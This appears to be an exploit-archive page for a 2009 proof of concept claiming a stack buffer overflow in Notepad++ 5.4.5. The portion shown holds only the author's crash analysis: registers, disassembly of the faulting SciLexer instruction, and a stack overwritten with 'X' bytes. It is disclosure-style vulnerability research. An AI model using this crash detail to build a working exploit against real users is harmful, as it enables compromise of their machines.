[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow PoC (0day)
# Published : 2009-09-16
# Author : fl0 fl0w
# Previous Title : BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC
# Next Title : KDE KDELibs 4.3.3 Remote Array Overrun
/*
**************************************************************
(0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC*
by fl0 fl0w *
**************************************************************
*/
/*****************************************************************************************************
LATEST FIXES *
Notepad++ v5.4.5 fixed bugs (from v5.4.4) : *
1. Fix plugins shortcuts not working bug. *
2. Fix the tooltip on toolbar display bug for the plugins icons. *
3. Fix a crash that was occurring when searching in files from a deep path. *
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.*
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml). *
6. Add SQL folding capacity. *
******************************************************************************************************
*/
/***************************************************************************
This is the latest version of notepad++. *
As you can see no buffer overflow bug is mentioned to exist or to be fixed.*
****************************************************************************
*/
/***********************************************************
DEBUGGING INFORMATION *
CPU REGISTERS *
EAX 00000000 *
ECX 003B74C4 *
EDX 00000000 *
EBX 0999A999 *
ESP 000E0764 *
EBP 000E0834 *
ESI 00B3D760 *
EDI 003B74B0 *
EIP 1000A258 SciLexer.1000A258 *
*
Function SciLexer() is causing this bug. *
Let's look at the assembly instructions: *
*
ASSEMBLY INSTRUCTIONS *
1000A258 8910 MOV DWORD PTR DS:[EAX],EDX *
1000A25A 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] *
1000A25D 8B80 60090000 MOV EAX,DWORD PTR DS:[EAX+960] *
1000A263 8B80 B0010000 MOV EAX,DWORD PTR DS:[EAX+1B0] *
1000A269 0FAF81 24060000 IMUL EAX,DWORD PTR DS:[ECX+624]*
1000A270 2055 FF AND BYTE PTR SS:[EBP-1],DL *
1000A273 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX *
1000A276 8B41 10 MOV EAX,DWORD PTR DS:[ECX+10] *
1000A279 05 6C0B0000 ADD EAX,0B6C *
1000A27E 8945 CC MOV DWORD PTR SS:[EBP-34],EAX *
1000A281 33C0 XOR EAX,EAX *
1000A283 6A 1F PUSH 1F *
1000A285 59 POP ECX *
*
EDX=00000000 *
DS:[00000000]=??? *
************************************************************
*/
/*************************************************************
STACK *
000BFEB4 004956A0 notepad+.004956A0 *
000BFEB8 F74B257B *
000BFEBC FFFFFFFE *
000BFEC0 58585858 *
000BFEC4 58585858 *
000BFEC8 58585858q *
000BFECC 58585858 *
000BFED0 58585858 *
000BFED4 58585858 *
000BFED8 58585858 *
000BFEDC 58585858 *
000BFEE0 58585858 *
000BFEE4 58585858 *
000BFEE8 58585858 *
000BFEEC 58585858 *
000BFEF4 58585858 *
000BFEF8 58585858 *
000BFEFC 58585858 *
000BFF00 58585858 *
000BFF04 58585858 *
000BFF0C 58585858 *
000BFF10 58585858 *
a